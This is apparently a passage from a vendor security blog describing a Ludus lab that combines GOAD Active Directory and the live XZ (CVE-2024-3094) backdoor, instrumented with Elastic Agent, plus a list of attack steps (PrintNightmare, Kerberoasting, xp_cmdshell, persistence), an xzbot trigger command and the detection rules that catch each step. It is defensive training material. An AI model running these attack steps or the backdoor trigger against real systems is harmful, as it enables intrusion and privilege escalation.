<pre><code>git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD
sudo apt install python3.11-venv
export LUDUS_API_KEY='myapikey'  # put your Ludus admin api key here nano ad/GOAD/providers/ludus/config.yml # customize the configuration here
./goad.sh -p ludus
GOAD/ludus/local &gt; check
GOAD/ludus/local &gt; set_lab GOAD # GOAD/GOAD-Light/NHA/SCCM
GOAD/ludus/local &gt; install
</code></pre>
<p>Two key configuration options can be used to customize the range:</p>
<ol>
<li>
<p><strong>Global Variables:</strong> To simplify the config and avoid repetition, the Elastic Agent variables are defined <em>once</em> at the top level in a global Ansible.vars block and are inherited by all VMs.</p>
<p><em>The enrollment token determines the Elastic Agent policy used.</em></p>
</li>
</ol>
<pre><code># ludus.yml
---
# --- GLOBAL ANSIBLE VARS (Simplification) ---
# Define Elastic agent vars once and apply globally
global_role_vars:
  ludus_elastic_fleet_server: &quot;&lt;your-fleet.example.com:443&gt;&quot; # Use 443 for cloud
  ludus_elastic_enrollment_token: &quot;&lt;your_enrollment_token&gt;&quot;
  ludus_elastic_agent_version: &quot;9.2.1&quot;
</code></pre>
<ol start="2">
<li><strong>VM-level Variables:</strong> The Elastic Agent variables can be configured at the VM-level to customize the policy applied. These can be combined with the global variable, for example, where the agent version and fleet_server are set via global variables, and the enrollment tokens are set at the VM-level to apply different policies to VMs.</li>
</ol>
<pre><code># --- VM DEFINITIONS ---
vms:
  # --- GOAD LAB (VLAN 10) ---
  - name: &quot;{{ range_id }}-GOAD-DC01&quot;
    hostname: &quot;{{ range_id }}-DC01&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 10
    ram_gb: 4
    cpus: 2
    windows: { sysprep: true }
    ansible:
      roles:
        - badsectorlabs.ludus_elastic_agent
      role_vars:
        ludus_elastic_enrollment_token: &quot;&lt;your_enrollment_token&gt;&quot; # different token for different policies
  # (Definitions for GOAD-DC02, GOAD-DC03, GOAD-SRV02, GOAD-SRV03 
  #  would follow, all inheriting the global ansible vars)
</code></pre>
<h4>Automating Elastic Agent Deployment</h4>
<p>The ludus.yml snippet above demonstrates the automation. By adding the <code>badsectorlabs.ludus_elastic_agent</code> role to the ansible.roles section of each VM definition, Ludus will automatically install and configure the agent during deployment.</p>
<p>This single Ansible role is compatible with all operating systems in our heterogeneous lab, including Windows (for GOAD), Kali, and Debian (for XZbot).</p>
<p>As shown in the simplified YAML, the ansible.vars block at the top level passes the critical parameters to the role:</p>
<ul>
<li>ludus_elastic_fleet_server: The Fleet server URL and port for your Elastic Cloud deployment (e.g., your-fleet.example.com:443).</li>
<li>ludus_elastic_enrollment_token: The token that enrolls the agent.<br />
The full example sets the ludus_elastic_enrollment_token at the VM level to demonstrate the ability to use different policies.</li>
<li>ludus_elastic_agent_version: The specific agent version to install (e.g., 9.2.1).</li>
</ul>
<p><em>Note: The Kali host will have Elastic Defend also deployed to monitor attacker behavior, this won’t be possible in a real-world scenario.</em></p>
<h2><strong>Safety First: Isolation, OPSEC, and Live Malware</strong></h2>
<p>This section contains a critical safety and operational security (OPSEC) warning. This configuration involves a significant, non-trivial risk that must be professionally managed.</p>
<h3><strong>4.1 The Threat: This is Not a Simulation</strong></h3>
<p>It must be stated unequivocally: The Ludus XZbot lab guide and its associated Ansible role install the <strong>actual, functional CVE-2024-3094 backdoor</strong>. This is not benign, simulated code. The lab's own documentation states: &quot;Danger: This role contains malware (on purpose).&quot;</p>
<p>While described as a &quot;passive backdoor&quot; (meaning it requires an attacker to actively trigger it), any virtual machine running this code with an open internet connection is a catastrophic liability. It could be scanned, exploited by unknown actors, or used as a pivot point to attack other networks.</p>
<h3><strong>4.2 The Contradiction: Isolation vs. Cloud Connectivity</strong></h3>
<p>This architecture creates a direct and critical operational conflict:</p>
<ol>
<li><strong>Requirement 1 (Safety):</strong> The malware lab <em>must</em> be isolated from the public internet to prevent compromise or breakout.</li>
<li><strong>Requirement 2 (Function):</strong> The Elastic Agent <em>must</em> have outbound internet connectivity to reach the Elastic Cloud Hosted / Elastic Serverless endpoints for enrollment and data streaming.</li>
</ol>
<p>A novice user would fail here, either by exposing their infected lab to the world or by isolating it so completely that no security telemetry can be collected.</p>
<h3><strong>4.3 The Solution: Pinhole Egress via Ludus Testing mode</strong></h3>
<p>The conflict is resolved using Ludus's built-in &quot;<a href="https://docs.ludus.cloud/docs/networking#testing-mode">testing</a>&quot; mode, which provides granular control over network egress. This feature is used for the pinhole egress, which enables agent control, telemetry, and log output.</p>
<pre><code># 1. Start the isolated testing session
ludus testing start # Note external DNS resolvers may also need to be added # ludus testing allow -i 1.1.1.1,8.8.8.8

# 2. Allow Elastic Fleet Server (Control Plane)
# Replace &lt;id&gt; with your specific deployment ID # Note the endpoint will differ based on the cloud providers
ludus testing allow -d &lt;your-deployment-id&gt;.fleet.us-central1.gcp.cloud.es.io

# 3. Allow Elasticsearch Ingest (Data Plane) # Note the endpoint will differ based on the cloud providers
ludus testing allow -d &lt;your-deployment-id&gt;.es.us-central1.gcp.cloud.es.io
</code></pre>
<p>This configuration delivers an expert-level solution: the malware is safely contained, while the Elastic Agent is granted only the minimal connectivity required to make policy updates (via communication with the <code>fleet</code> endpoint) and to ingest data (via communication with the <code>ES</code> endpoint).</p>
<h3><strong>4.4 Accessing the Range in Testing Mode (WireGuard)</strong></h3>
<p>Once Testing Mode is active, standard routing fails. You cannot simply SSH into your Kali VM from your local LAN because the router drops the traffic. Ludus provides an out-of-band management channel using WireGuard.</p>
<p>Ludus configures a WireGuard interface (wg0) on the router VM (198.51.100.1) and assigns you a static client IP (e.g., 198.51.100.2).</p>
<ul>
<li><strong>Persistent Allow Rules:</strong> The router's firewall configuration includes specific rules in the LUDUS_DEFAULTS chain. These rules explicitly <strong>ACCEPT</strong> traffic sourced from or destined to the WireGuard subnet (198.51.100.0/24).</li>
<li><strong>Priority:</strong> Because these rules exist in the LUDUS_DEFAULTS chain, they override the DROP rules applied by Testing Mode.</li>
</ul>
<p><strong>How to connect:</strong></p>
<ol>
<li><a href="https://docs.ludus.cloud/docs/quick-start/using-cli-locally#wireguard">Generate your config</a>: ludus user wireguard &gt; ludus.conf</li>
<li>Import this into your local WireGuard client and activate the tunnel.</li>
<li>Connect directly to the private IPs of your VMs (e.g., 10.10.10.11) over the tunnel.</li>
</ol>
<h2><strong>Phase 2: Executing the Attacks</strong></h2>
<p>With the high-fidelity, fully instrumented range deployed, the &quot;Red Team&quot; phase can begin. This involves logging into a dedicated attacker VM (like the included Kali VM or a remnux-analyzer VM) and executing the attacks. This activity generates the rich, malicious telemetry that Elastic Defend will capture.</p>
<p>This combined range allows for testing defenses against the two dominant, macro-level threat vectors: identity-based &quot;living-off-the-land&quot; (LotL) attacks and vulnerability-based supply-chain intrusions.</p>
<h3><strong>5.1 Active Directory Simulation (GOAD)</strong></h3>
<ul>
<li><strong>Initial Access</strong> (Credential Stuffing)
<ol>
<li>The attacker targets the external perimeter. Using a list of breached credentials, you execute a password stuffing attack against the Essos.local domain. You successfully validate the credentials for the user khal.drogo.</li>
<li>Sample Tool: kerbrute or smartbrute</li>
<li>Result: Valid credentials for a low-privilege domain user.</li>
</ol>
</li>
<li><strong>Privilege Escalation</strong> (PrintNightmare)
<ol>
<li>khal.drogo has limited rights. To gain a foothold on the CastelBlack server, you exploit PrintNightmare (CVE-2021-34527). This vulnerability in the Windows Print Spooler service allows any authenticated user to install a malicious print driver. You upload a driver that adds a new local admin user to the box.</li>
<li>Sample Tool: CVE-2021-34527.py exploit script</li>
<li>Result: Local SYSTEM access on CastelBlack.</li>
</ol>
</li>
<li><strong>Credential Dump</strong> (DCSync Preparation)
<ol>
<li>Now running as SYSTEM/Admin on CastelBlack, you inspect the machine for cached credentials. You run Impacket's secretsdump to pull hashes from the SAM database and LSASS memory. You discover the NTLM hash for the built-in Administrator account, which was left in memory from a previous support session.</li>
<li>Sample Tool: impacket-secretsdump</li>
<li>Result: NTLM Hash of a Domain Admin or high-privilege account.</li>
</ol>
</li>
<li><strong>Kerberoasting</strong>
<ol>
<li>With valid domain credentials, you pivot to the internal network. You request Kerberos Service Tickets (TGS) for Service Principal Names (SPNs) in the environment. You target the MSSQLSvc account. You take the encrypted ticket offline and crack it to reveal the plaintext password for the SQL service account.</li>
<li>Sample Tool: Rubeus or GetUserSPNs.py</li>
<li>Result: Plaintext password for the MSSQL service account.</li>
</ol>
</li>
<li><strong>MSSQL Attacks</strong>
<ol>
<li>You use the cracked SQL credentials to authenticate directly to the Braavos SQL Server. Since the service account has sysadmin rights, you abuse the xp_cmdshell stored procedure. This feature allows you to spawn a Windows command shell directly from a SQL query, effectively giving you Remote Code Execution (RCE) on the database server.</li>
<li>Sample Tool: mssqlclient.py</li>
<li>Result: RCE on the Database Server.</li>
</ol>
</li>
<li><strong>Persistence</strong> (Scheduled Task)
<ol>
<li>To ensure you don't lose access if the SQL password changes, you establish persistence. You create a Windows Scheduled Task on the compromised SQL server. This task is configured to execute a beacon binary every day, running as SYSTEM.</li>
<li>Sample Tool: schtasks.exe or PowerShell</li>
<li>Result: Long-term persistence.</li>
</ol>
</li>
</ul>
<h3><strong>5.2 Malware Lab Simulation (XZbot)</strong></h3>
<ul>
<li>Step 7: Supply Chain Pivot (XZ Backdoor)</li>
<li>Simultaneously, you target the Linux infrastructure in the DMZ. You trigger the pre-implanted XZ Backdoor (CVE-2024-3094) on the xz-backdoor-dect VM. By manipulating the SSH handshake with a specific cryptographic key, you bypass authentication entirely and execute commands as root without leaving standard SSH logs.</li>
<li>Tool: xzbot</li>
<li>Result: Root access on Linux infrastructure via supply chain compromise.</li>
<li>The attacker uses the xzbot client provided in the Ludus lab.</li>
<li>From the attacker VM, the following command is run to trigger the backdoor on the vulnerable Debian host:<br />
xzbot --ssh-addr '10.X.X.X:22' -cmd 'setsid sh -c &quot;echo test&quot;' 2&gt;&amp;1</li>
<li>This action causes the sshd process on the target to anomalously spawn a shell and execute the command as root, creating definitive proof of execution.</li>
</ul>
<h2><strong>Phase 3: Unified Detection &amp; Investigation with Elastic Security</strong></h2>
<p>This is the &quot;Blue Team&quot; payoff. The telemetry and alerts generated in Phase 2 are now available for analysis within the unified Elastic Security platform.</p>
<h3><strong>6.1 The &quot;Powerful SIEM&quot;: Centralized Visibility &amp; Prebuilt Detections</strong></h3>
<p>The power of the Elastic SIEM is not just in its ability to passively collect logs. Its power comes from the <em>active analysis</em> it performs on the deep, contextual data provided by Elastic Defend. The &quot;Complete Endpoint Visibility&quot; from Defend provides not just basic logs, but kernel-level telemetry - process creations, file modifications, network connections, and registry changes.</p>
<p>This rich data, all normalized to the Elastic Common Schema (ECS), feeds Elastic's extensive library of <strong>~1500+ prebuilt, MITRE-mapped detection rules</strong>. These rules are researched, developed, and maintained by the Elastic Security Labs team, providing out-of-the-box detection value.</p>
<p>The Ludus range serves as the perfect validation platform for this value. The attacks executed in Phase 2 are not theoretical; they are mapped directly to specific expected artifacts (&quot;smoking gun&quot;). A combination of prebuilt rules and custom rules is intentionally used together in the example to alert on specific behaviors.</p>
<table>
<thead>
<tr>
<th align="left">Attack Step</th>
<th align="left">MITRE ATT&amp;CK</th>
<th align="left">Elastic Detection Rule</th>
<th align="left">Expected Artifact (&quot;smoking gun&quot;)</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>1. Credential Stuffing</strong></td>
<td align="left">T1110 (Brute Force)</td>
<td align="left"><strong>Potential Account Brute Force (Custom)</strong></td>
<td align="left">Abnormal Auth Success (Event 4624 and ssh login) across hosts.</td>
</tr>
<tr>
<td align="left"><strong>2. PrintNightmare</strong></td>
<td align="left">T1068 (Exploitation)</td>
<td align="left"><strong>Unusual Print Spooler Child Process</strong></td>
<td align="left">Unusual Print Spooler service (spoolsv.exe) child processes.</td>
</tr>
<tr>
<td align="left"><strong>3. Credential Dump</strong></td>
<td align="left">T1003.006 (OS Credential Dumping)</td>
<td align="left"><strong>Potential Remote Credential Access via Registry</strong></td>
<td align="left">Abnormal access to the Security Account Manager (SAM) registry hive.</td>
</tr>
<tr>
<td align="left"><strong>4. Kerberoasting</strong></td>
<td align="left">T1558.003 (Kerberoasting)</td>
<td align="left"><strong>Suspicious Kerberos Authentication Ticket Request (Custom)</strong></td>
<td align="left">Event ID 4769 with 0x17 (RC4) encryption requested.</td>
</tr>
<tr>
<td align="left"><strong>5. MSSQL Attacks</strong></td>
<td align="left">T1505.001 (SQL Stored Procedures)</td>
<td align="left"><strong>Execution via MSSQL xp_cmdshell Stored Procedure</strong></td>
<td align="left">Execution via MSSQL xp_cmdshell stored procedure</td>
</tr>
<tr>
<td align="left"><strong>6. Persistence</strong></td>
<td align="left">T1053.005 (Scheduled Task)</td>
<td align="left"><strong>A scheduled task was created</strong></td>
<td align="left">Event ID 4698 or schtasks.exe /create.</td>
</tr>
<tr>
<td align="left"><strong>7. XZ Backdoor</strong></td>
<td align="left">T1210 (Exploitation of Remote Services)</td>
<td align="left"><strong>Potential Execution via SSH Backdoor</strong></td>
<td align="left">sshd spawns unusual child processes like sh or bash.</td>
</tr>
</tbody>
</table>
<p><em>Note: Elastic detection rules are open and transparent. You can view the logic, contribute, or raise issues directly on the(<a href="https://github.com/elastic/detection-rules">https://github.com/elastic/detection-rules</a>).</em></p>
<h3><strong>6.2 Deep Dive: Tracing Process Chains with Event Analyzer</strong></h3>
<p>The two labs (GOAD and XZbot) provide a perfect opportunity to use Elastic's specialized investigation tools. The user interface of the Event Analyzer is designed to abstract the complexity of JSON logs into a cognitive model that aligns with how security analysts think: <strong>Process Chains.</strong> The interface is comprised of three primary interaction zones: the Graphical Canvas, the Detail Panel, and the Timeline integration.</p>
<h4>What are we seeing?</h4>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image1.png" alt="" /></p>
<h4></h4>
<h5>The Graphical Canvas (The Process Tree)</h5>
<p>The central view is a directed acyclic graph where:</p>
<ul>
<li><strong>Nodes (Cubes):</strong> Each cube represents a distinct process execution. The visualization distinguishes between the &quot;Anchor&quot; event (highlighted with a blue halo) and the surrounding context.</li>
<li><strong>Edges (Lines):</strong> Lines represent the parent-child relationship. The directionality is implicit (top-down or left-right), showing the flow of execution.</li>
<li><strong>Visual Badging:</strong> Nodes are not static icons; they are dynamic indicators.
<ul>
<li><strong>Alert Badges:</strong> If a specific process triggered a detection rule (e.g., &quot;Malware Detected&quot;), a colored badge appears on the cube. This allows an analyst to instantly identify which step in the chain was flagged by the detection engine.</li>
<li><strong>User Context:</strong> Visual cues may indicate if a process changed user context (e.g., from a local user to SYSTEM), signaling privilege escalation.</li>
</ul>
</li>
</ul>
<h5>The Detail Panel (Forensic Metadata)</h5>
<p>Clicking on any node triggers the Detail Panel, typically sliding in from the right. This panel is the primary source of &quot;What you can see&quot; at a granular level. It exposes fields critical for verification:</p>
<ul>
<li><strong>Command Line Arguments:</strong> This is arguably the single most valuable forensic artifact. The Analyzer displays the full string, exposing flags, scripts, and encoded payloads (e.g., powershell.exe -w hidden -enc Base64).</li>
<li><strong>Process Path and Hash:</strong> The full file path helps identify masquerading (e.g., svchost.exe running from C:Temp instead of C:\Windows\System32). File hashes (MD5, SHA-1, SHA-256) are presented for cross-referencing with threat intelligence.</li>
<li><strong>Signer Information:</strong> Information about the binary's digital signature helps distinguish between trusted Microsoft binaries and unsigned malware.</li>
<li><strong>Related Event Counts:</strong> Instead of cluttering the graph with thousands of file modifications, the node displays summary statistics (e.g., &quot;15 File Events,&quot; &quot;3 Network Connections&quot;). Clicking these stats usually drills down into a list view or timeline of those specific actions.</li>
</ul>
<h5>The Temporal Dimension (Time Filter)</h5>
<p>A critical, often overlooked aspect of the Analyzer is its handling of time. Attacks can have long &quot;dwell times.&quot; A parent process might have started weeks ago (e.g., a legitimate service), while the malicious child spawned today. The Analyzer includes a time slider that allows the analyst to expand the query window. By default, it might look at a narrow window around the alert, but expanding this allows the graph to &quot;reach back&quot; into the Warm or Cold data tiers to find the long-running parent process.</p>
<h4>How does it work?</h4>
<p>The operational capability of the Event Analyzer leverage the <strong>Elastic Common Schema (ECS)</strong>. In a heterogeneous security environment, logs originate from diverse sources—Windows endpoints, Linux servers, network firewalls, and cloud service providers—each with a unique taxonomy. A CrowdStrike agent might label a process ID as TargetProcessId, while a Sysmon event uses ProcessId. Without normalization, correlating these events into a single chain is algorithmically impossible.<br />
ECS solves this by enforcing a strict field hierarchy. The Event Analyzer relies on specific, high-fidelity ECS fields to construct the visual graph:</p>
<ul>
<li><strong>process.entity_id</strong>: This is the cornerstone of the Analyzer's logic. Operating systems recycle Process IDs (PIDs). A PID of 1234 might belong to svchost.exe at 09:00 and malware.exe at 14:00. Relying on PID for long-term historical analysis introduces collisions that would corrupt the visual graph, linking unrelated events. The process.entity_id is a unique string generated by the Elastic Agent (or ECS-compliant beats) that persists uniquely in the index, ensuring that the graph represents a distinct execution instance, regardless of PID reuse.</li>
<li><strong>process.parent.entity_id</strong>: This field establishes the directed edge between nodes. By recursively querying for events where the process.entity_id of one event matches the process.parent.entity_id of another, the Analyzer reconstructs the lineage.</li>
</ul>
<p><strong>event.sequence</strong>: In high-velocity environments, the order of events (e.g., did the file modification happen before or after the network connection?) is critical. ECS timestamps and sequence numbers allow the Analyzer to order events chronologically within the visual node details.</p>
<h3><strong>6.3 Deep Dive: Reconstructing User Activity with Session Viewer</strong></h3>
<p>For the <strong>XZbot</strong> (Linux) attack, the <strong>Session Viewer</strong> is the superior tool. It is specifically designed for <strong>&quot;monitoring and investigating session activity on Linux infrastructure&quot;</strong>.</p>
<p>When the Potential Execution via XZBackdoor alert fires, the analyst investigates the associated sshd process. The Session Viewer presents a <strong>&quot;highly readable format inspired by the terminal&quot;</strong>. It reconstructs the attacker's session, showing the sshd process and its anomalous child process (sh).</p>
<p>Furthermore, it will show the <em>exact command</em> that was executed (<code>sh -c setsid sh -c &quot;usermod -aG sudo sysadmin_backup&quot;</code>) and can even display the <em>output</em> of that command. This is the definitive &quot;smoking gun&quot;, presented to the analyst in plain, human-readable text, effectively allowing them to watch the attacker's TTY session after the fact.</p>
<h4>What are we seeing?</h4>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image2.png" alt="" /></p>
<p>The user interface of the Session Viewer is explicitly designed to bridge the gap between abstract log analysis and the native terminal experience of a Linux administrator. Unlike the Event Analyzer, which focuses on malware process chains, the Session Viewer presents a time-ordered, tree-based visualization that reconstructs the linear narrative of a shell session.</p>
<h5>The Process Tree and Timeline</h5>
<p>The central component of the view is a <strong>Directed Acyclic Graph (DAG)</strong> displayed as a hierarchical list.</p>
<ul>
<li><strong>Vertical Flow:</strong> The Session Viewer arranges processes vertically, mimicking the flow of a terminal history file but preserving hierarchy. Child processes are indented relative to their parents. This allows an analyst to immediately distinguish between a command run directly by the user (e.g., curl) and a process spawned by a script execution (e.g., curl executing inside a setup.sh script).</li>
<li><strong>Verbose Mode:</strong> A toggle allows analysts to switch between a filtered view (showing significant user activity) and &quot;Verbose Mode.&quot; When enabled, this mode reveals typically noisy events like shell startup scripts (.bashrc execution), shell completion helpers, and forks caused by built-in commands. This is crucial for detecting persistence mechanisms hidden in profile scripts.</li>
</ul>
<h5>Visual Badging and Indicators</h5>
<p>The UI employs a sophisticated system of badges and icons to provide immediate context without requiring the analyst to drill down into every node. These visual cues are essential for rapid triage.</p>
<h6><em>Visual Indicators in Elastic Session Viewer</em></h6>
<table>
<thead>
<tr>
<th align="left">Badge/Icon</th>
<th align="left">Visual Appearance</th>
<th align="left">Meaning</th>
<th align="left">Forensic Implication</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Exec User Change</strong></td>
<td align="left">Explicit Text Badge</td>
<td align="left">The user context changed (e.g., su, sudo).</td>
<td align="left">Critical for identifying privilege escalation. Shows exactly when a standard user became root.</td>
</tr>
<tr>
<td align="left"><strong>Process Alert</strong></td>
<td align="left">Gear Icon</td>
<td align="left">A process event triggered a detection rule.</td>
<td align="left">Indicates execution of malicious binaries or suspicious arguments (e.g., whoami).</td>
</tr>
<tr>
<td align="left"><strong>File Alert</strong></td>
<td align="left">Page Icon</td>
<td align="left">A file modification triggered a rule.</td>
<td align="left">Indicates tampering, persistence creation (cron/systemd), or exfiltration staging.</td>
</tr>
<tr>
<td align="left"><strong>Network Alert</strong></td>
<td align="left">Page Icon (Secondary)</td>
<td align="left">A network event triggered a rule.</td>
<td align="left">Indicates C2 communication, lateral movement, or exfiltration.</td>
</tr>
<tr>
<td align="left"><strong>Multiple Alerts</strong></td>
<td align="left">Combined Badge</td>
<td align="left">Single event triggered multiple rule types.</td>
<td align="left">High-confidence indicator of malicious activity (e.g., a process dropped a file and executed it).</td>
</tr>
<tr>
<td align="left"><strong>Alert Count</strong></td>
<td align="left">Numeric (e.g., (2))</td>
<td align="left">Total alerts associated with a node.</td>
<td align="left">Helps prioritize which steps in the chain were most &quot;noisy&quot; to detection logic.</td>
</tr>
</tbody>
</table>
<h5>Terminal Output View</h5>
<p>Hovering over the <strong>Terminal Output</strong> button on a process node reveals a badge indicating the size of the captured output. Clicking this button opens the Terminal Output view, which renders the process.io.text data. This is the &quot;Smoking Gun&quot; feature for Linux investigations.</p>
<ul>
<li><strong>Replay Capability:</strong> It allows the analyst to see exactly what the user saw. If an attacker ran cat /etc/passwd, the process tree shows the execution; the Terminal Output view shows the <em>content</em> of the passwd file as it was displayed to the attacker.</li>
<li><strong>Input Reconstruction:</strong> Because the viewer captures TTY I/O, it captures not just the command execution, but the <em>typing</em>. This can reveal backspaces, typos, and corrections (e.g., typing sdo [backspace] sudo), which are strong behavioral indicators of a human adversary rather than an automated script.</li>
</ul>
<h2><strong>The Elastic Advantage: AI-Powered Automated Hunting</strong></h2>
<p>The process described in Phase 3 demonstrates a powerful, analyst-driven investigation. However, the primary advantage of using <strong>Elastic Cloud Hosted (ECH)</strong> or <strong>Elastic Serverless</strong> is the programmatic access to an integrated Generative AI stack. This stack elevates the process from <em>manual correlation</em> to <em>AI-driven automated hunting</em>.</p>
<p><em>Note: Elastic's AI features work with the out-of-the-box Elastic Managed LLMs or with <a href="https://www.elastic.co/kr/docs/solutions/security/ai/set-up-connectors-for-large-language-models-llm#connect-to-a-third-party-llm">third-party LLMs</a> configured using one of the available connectors.</em></p>
<h3><strong>7.1 From Alerts to Attacks: Automated Correlation with Attack Discovery</strong></h3>
<p>The GOAD + XZbot labs will generate <em>multiple</em> discrete alerts, as shown in the table above. A junior analyst would be faced with a queue of alerts: Potential Kerberoasting, Suspicious Certificate Request, and Potential XZBackdoor and have to manually &quot;stitch together&quot; this complex, cross-domain attack.</p>
<p>This is the problem solved by <strong>Attack Discovery</strong>. This GenAI feature, available in Enterprise and Serverless tiers, <strong>&quot;delivers fully automated threat hunting at scale&quot;</strong>. It &quot;AI analyzes every alert to uncover hidden threats&quot;, automatically correlating the disparate signals from the Ludus lab into a single, high-fidelity &quot;Attack&quot; investigation.</p>
<p>The primary value of Attack Discovery for a forensic analyst is the compression of time. It automates the &quot;mental stitching&quot; that defines tier-one and tier-two analysis.</p>
<h4>Deconstructing the &quot;Mental Stitching&quot;</h4>
<p>Consider an example investigation without Attack Discovery.</p>
<ol>
<li><strong>Trigger:</strong> You see an alert: &quot;Suspicious PowerShell Execution.&quot;</li>
<li><strong>Query:</strong> You pivot to the host timeline.</li>
<li><strong>Scan:</strong> You scroll back 15 minutes. You see a &quot;File Download&quot; event.</li>
<li><strong>Hypothesis:</strong> &quot;Maybe the user downloaded a bad file, which launched PowerShell.&quot;</li>
<li><strong>Verification:</strong> You check the file name. It is invoice.js.</li>
<li><strong>Conclusion:</strong> &quot;Confirmed malware download.&quot;</li>
</ol>
<p>This process takes between 10 and 30 minutes, dependingon the analyst's skill and familiarity with the environment. Attack Discovery performs this entire sequence in seconds. It looks at the PowerShell alert, sees the file download event in the related context, and presents a Discovery stating: <em>&quot;User executed suspicious PowerShell script likely originating from downloaded file 'invoice.js'.&quot;</em></p>
<p>This feature includes <strong>Data Persistence</strong> (results are saved for historical tracking) and <strong>Scheduling &amp; Actions</strong> (it runs automatically and can trigger responses or subsequent Elastic Workflows), moving the SOC from a reactive to a proactive posture.</p>
<h5>Example</h5>
<p>In our example, as the Attack occurs, we start to see alerts. Instead of triaging the alerts individually, we leverage Attack Discovery for triage.<br />
Compressing the mean-time-to-triage down to seconds and quickly identifying the 2 attacks.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image3.gif" alt="" /></p>
<h3><strong>7.2 Accelerating Triage with the AI Assistant</strong></h3>
<p>The Elastic Security Assistant uses generative AI to help you find, fix and understand security threats. It works directly inside Elastic Security. You interact with it through a chat interface to investigate alerts and write code.</p>
<p>In our example, once Attack Discovery identifies a correlated attack, we then use the <strong>AI Assistant</strong> to investigate. The assistant provides two key capabilities:</p>
<ol>
<li><strong>Natural Language Investigations:</strong> The analyst can ask plain-English questions like, &quot;Summarize this attack&quot;, &quot;What is the MITRE Tactic for this process?&quot;, &quot;What is print spooler?&quot; or “Provide some remediation suggestions.”</li>
</ol>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image7.png" alt="" /></p>
<ol start="2">
<li><strong>Agentic Query Validation workflow:</strong> This advanced feature allows the AI to <strong>&quot;generate bespoke, validated ES|QL queries&quot;</strong>. An analyst can ask, &quot;Find all network connections from the host involved in the XZbot alert&quot;, and the assistant will write, validate, and <strong>self-correct</strong> the query before presenting it, drastically lowering the skill barrier to high-end threat hunting.<br />
<img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image4.png" alt="" /></li>
</ol>
<h4>How It Works</h4>
<p>The Assistant connects your Elastic Stack to an LLM of your choice (e.g., GPT-5, Claude, Gemini). It uses Retrieval Augmented Generation (RAG) to fetch relevant data—logs, alerts, and internal documentation—from your environment. You can configure it to anonymize sensitive fields (PII or host/IP metadata) before sending the prompt to the model, ensuring your data remains private while the model reasons the behavioral patterns.</p>
<h3><strong>7.3 Intelligent Automation with Elastic Workflows</strong></h3>
<p>The attacks described above generate complex, multi-stage alerts. Handling these manually is slow. Elastic has addressed this by acquiring <a href="https://www.elastic.co/kr/blog/elastic-and-keep-join-forces"><strong>Keep</strong></a>, an open-source AIOps and alert management platform. In <a href="https://www.elastic.co/kr/blog/whats-new-elastic-9-3-0">Elastic 9.3</a>, this technology is integrated directly into Kibana in Technical Preview as <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows">Elastic <strong>Workflows</strong></a>.</p>
<h4>What are Workflows?</h4>
<p>Elastic Workflows is an automation engine built into the Elasticsearch platform. You define Workflows in YAML - what triggers them, what steps they take, what actions they perform - and the platform handles execution. A Workflow can query your environment, transform and enrich security data, branch based on conditions, call external APIs, and integrate with services like Slack, Jira, PagerDuty and more through connectors you've already configured. Workflows can also call AI agents to reason through complex investigations, then continue with response actions based on what the agent discovers. Elastic Workflows combines scripted automation with AI reasoning natively in your SIEM, where your security data already lives.</p>
<h4>How It Works: The &quot;Alert Aggregator &amp; Workflow Engine&quot;</h4>
<p>Workflows become the <strong>middleware layer</strong> between detection and remediation, working through three primary mechanisms:</p>
<ul>
<li><strong>Multi-Source Ingestion:</strong> Workflows extend beyond Elastic. Pulling in additional data for enrichment, analysis or initial triage.</li>
<li><strong>Workflow-as-Code (YAML):</strong> Workflows are defined in YAML files. This allows teams to version control their incident response procedures as code.</li>
<li><strong>The Workflow Engine:</strong> When an alert triggers in Elastic (or an external tool), the Workflow Engine executes a series of steps:
<ol>
<li><strong>Enrichment:</strong> Querying an API (like VirusTotal or Active Directory) to add context.</li>
<li><strong>Logic:</strong> Using if/else statements to determine severity.</li>
<li><strong>Action:</strong> Sending a Slack message, creating a Jira ticket, or triggering an Elastic Defend response action.</li>
</ol>
</li>
</ul>
<p><strong>Consider an example Alert and Action flow.</strong></p>
<ul>
<li><strong>Trigger:</strong> You connect the workflow to a specific rule, such as &quot;Malicious Detection Alert&quot;.</li>
<li><strong>Steps:</strong> You define a sequence of actions.
<ol>
<li><strong>Triage (Agentic):</strong> Pass the alert to the AI Assistant. Ask the questions: &quot;How would we remediate and respond to the alert below?”</li>
<li><strong>Enrich</strong>: Attach the AI Assistant's response as a note to the alert.</li>
<li><strong>Respond:</strong> Create a case with a link to the alert note.</li>
</ol>
</li>
</ul>
<h5>Example</h5>
<p>In our example, we have alerts that trigger our Workflow - Alert Enrichment &amp; Case Creation.<br />
We will also directly trigger it from the Workflows UI to demonstrate the various steps.</p>
<ul>
<li>The Alert context is provided as an input to the Security AI Assistant</li>
<li>The response is added as a note to the Security alerts</li>
<li>A case is created with metadata from the Alert (timestamp, severity, rule name and alert reason).</li>
<li>A link to the case is added to the case as a comment. <em>Note: this is not shown in the GIF</em>.</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image6.gif" alt="" /></p>
<h2><strong>Conclusion: From Manual Setup to Continuous Emulation</strong></h2>
<p>This blog has provided a complete blueprint for an advanced, scalable, and most importantly, a safe simulation range.</p>
<ol>
<li><strong>We built:</strong> A complex, multi-lab range (GOAD + XZbot) was deployed with a single command using Ludus.</li>
<li><strong>We instrumented:</strong> The entire range was seamlessly instrumented with Elastic Agent and Defend as part of the automated deployment, using the ludus_elastic_agent Ansible role.</li>
<li><strong>We secured:</strong> The critical conflict between malware isolation and cloud-agent connectivity was solved using Ludus's granular &quot;OPSEC&quot; networking controls.</li>
<li><strong>We validated:</strong> The platform's powerful SIEM capabilities were proven by <em>validating</em> Elastic's prebuilt, out-of-the-box detection rules against live, known-bad attacks.</li>
